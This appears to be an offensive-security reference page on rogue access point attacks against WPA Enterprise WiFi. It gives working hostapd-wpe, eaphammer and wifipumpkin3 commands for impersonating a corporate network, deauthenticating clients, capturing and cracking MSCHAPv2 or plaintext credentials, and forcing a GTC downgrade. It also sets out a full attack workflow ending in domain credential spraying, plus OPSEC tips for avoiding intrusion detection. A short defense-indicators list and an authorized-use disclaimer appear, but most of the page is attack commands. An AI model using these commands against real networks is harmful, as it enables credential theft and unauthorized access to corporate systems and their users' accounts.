HOSTAPD-WPE
Authorized use only. Offensive reference for systems you own or are explicitly permitted to test. You are responsible for staying within the law.
Rogue access point and WPA Enterprise (802.1X/EAP) attacks. Capture credentials from corporate WiFi networks using RADIUS impersonation.
HOSTAPD-WPE INSTALLATION#
# Kali Linux sudo apt install hostapd-wpe # From source git clone https://github.com/OpenSecurityResearch/hostapd-wpe cd hostapd-wpe # Follow build instructions in README # Generate certificates (if needed) cd /etc/hostapd-wpe/certs ./bootstrap # Generate CA + server cert
HOSTAPD-WPE CONFIGURATION#
# Config file: /etc/hostapd-wpe/hostapd-wpe.conf # Key settings: interface=wlan0 # WiFi interface ssid=CorpWiFi # ESSID to impersonate channel=6 # Channel hw_mode=g # 2.4GHz (a for 5GHz) # EAP settings eap_user_file=/etc/hostapd-wpe/hostapd-wpe.eap_user server_cert=/etc/hostapd-wpe/certs/server.pem private_key=/etc/hostapd-wpe/certs/server.key ca_cert=/etc/hostapd-wpe/certs/ca.pem dh_file=/etc/hostapd-wpe/certs/dh # WPA Enterprise wpa=2 wpa_key_mgmt=WPA-EAP wpa_pairwise=CCMP ieee8021x=1 eapol_version=2
RUNNING HOSTAPD-WPE#
# Start rogue AP sudo hostapd-wpe /etc/hostapd-wpe/hostapd-wpe.conf # Output shows captured credentials: # mschapv2: username:DOMAIN\user # challenge: XX:XX:XX:XX:XX:XX:XX:XX # response: XX:XX:XX:XX:XX:XX:XX:XX:XX:XX:XX:XX:XX:XX:XX:XX:XX:XX:XX:XX:XX:XX:XX:XX # Credentials logged to: /var/log/hostapd-wpe.log # With verbose output sudo hostapd-wpe /etc/hostapd-wpe/hostapd-wpe.conf -ddd
CRACKING CAPTURED CREDENTIALS#
# MSCHAPv2 challenge/response → NTLMv1 hash # Format for hashcat: # username::::response:challenge # Hashcat (NetNTLMv1) hashcat -m 5500 captured_hash.txt wordlist.txt # John the Ripper john --format=netntlm captured_hash.txt --wordlist=wordlist.txt # asleap (dedicated MSCHAPv2 cracker) asleap -C CHALLENGE -R RESPONSE -W wordlist.txt
EAP TYPES OVERVIEW#
Type Credential Exposure Attack Feasibility ---- -------------------- ------------------ EAP-PEAP/MSCHAPv2 Challenge/response High (capturable, crackable) EAP-TTLS/PAP Plaintext password! High (trivial if no cert check) EAP-TTLS/MSCHAPv2 Challenge/response High (same as PEAP) EAP-TLS Client certificate Low (mutual cert auth) EAP-GTC Plaintext token Medium (one-time tokens) EAP-FAST PAC-based Medium (PAC theft) EAP-SIM/AKA SIM-based Low (requires SIM)
EAPHAMMER (ALTERNATIVE TOOL)#
# Modern rogue AP framework git clone https://github.com/s0lst1c3/eaphammer cd eaphammer sudo ./kali-setup # Generate certs sudo ./eaphammer --cert-wizard # Capture credentials (evil twin) sudo ./eaphammer -i wlan0 --auth wpa-eap --essid CorpWiFi --channel 6 --creds # GTC downgrade attack sudo ./eaphammer -i wlan0 --auth wpa-eap --essid CorpWiFi --channel 6 --negotiate gtc-downgrade --creds # Hostile portal attack sudo ./eaphammer -i wlan0 --auth wpa-eap --essid CorpWiFi --channel 6 --hostile-portal # PMKID capture sudo ./eaphammer -i wlan0 --pmkid --bssid AP_BSSID
WIFIPUMPKIN3 (ROGUE AP FRAMEWORK)#
# Modern evil twin framework sudo apt install wifipumpkin3 # Start sudo wifipumpkin3 # Set interface and SSID wp3> set interface wlan0 wp3> set ssid FreeWiFi wp3> set proxy noproxy # Start rogue AP wp3> start # With captive portal wp3> set proxy captiveflask wp3> start # Plugins: DNS spoof, credential capture, inject JS
ATTACK WORKFLOW#
# 1. Reconnaissance # Identify target WPA Enterprise network # Determine EAP type (airodump-ng, probe requests) # Note SSID, channel, BSSID # 2. Setup rogue AP # Configure hostapd-wpe with target SSID # Generate convincing SSL certificate # Match channel and security settings # 3. Force client connection # Deauth clients from legitimate AP sudo aireplay-ng -0 10 -a LEGIT_AP_BSSID wlan0mon # Clients reconnect to rogue AP (if no cert validation) # 4. Capture credentials # MSCHAPv2 challenge/response captured # Or plaintext (EAP-TTLS/PAP, GTC downgrade) # 5. Crack credentials # hashcat -m 5500 for NetNTLMv1 # Or use asleap for quick cracking # 6. Use credentials # Connect to legitimate network # Or use for AD credential spraying
GTC DOWNGRADE ATTACK#
# Force clients to use EAP-GTC instead of MSCHAPv2 # EAP-GTC sends credentials in plaintext! # Works when client doesn't validate server cert # eaphammer sudo ./eaphammer -i wlan0 --auth wpa-eap --essid Corp \ --channel 6 --negotiate gtc-downgrade --creds # Captured credentials are plaintext passwords
DEFENSE INDICATORS#
- Rogue AP with same ESSID but different BSSID - Invalid/self-signed RADIUS server certificate - Deauthentication floods before credential capture - WIDS alerts for duplicate SSIDs - Client certificate validation prevents most attacks
OPSEC CONSIDERATIONS#
- Use matching SSID and similar BSSID to legitimate AP - Generate SSL certificate mimicking real RADIUS server - Position rogue AP close to targets - Deauth sparingly to avoid WIDS detection - EAP-TLS networks are immune (mutual cert auth) - Many modern devices validate RADIUS certificates - Android < 11 is often vulnerable (no cert validation default) - iOS/macOS require explicit cert trust (harder to exploit) - Windows respects GPO certificate settings
TIPS#
- EAP-TTLS/PAP gives plaintext passwords (best case) - GTC downgrade works against poorly configured clients - EAP-TLS is secure — focus on PEAP/TTLS targets - asleap is fastest for cracking MSCHAPv2 - Use eaphammer for modern attacks (GTC downgrade) - Always deauth to force reconnection to rogue AP - Certificate warnings are the main defense — many users click through - Captured creds often work for VPN and domain login too - Test both 2.4GHz and 5GHz channels - hostapd-wpe logs all captured creds to /var/log/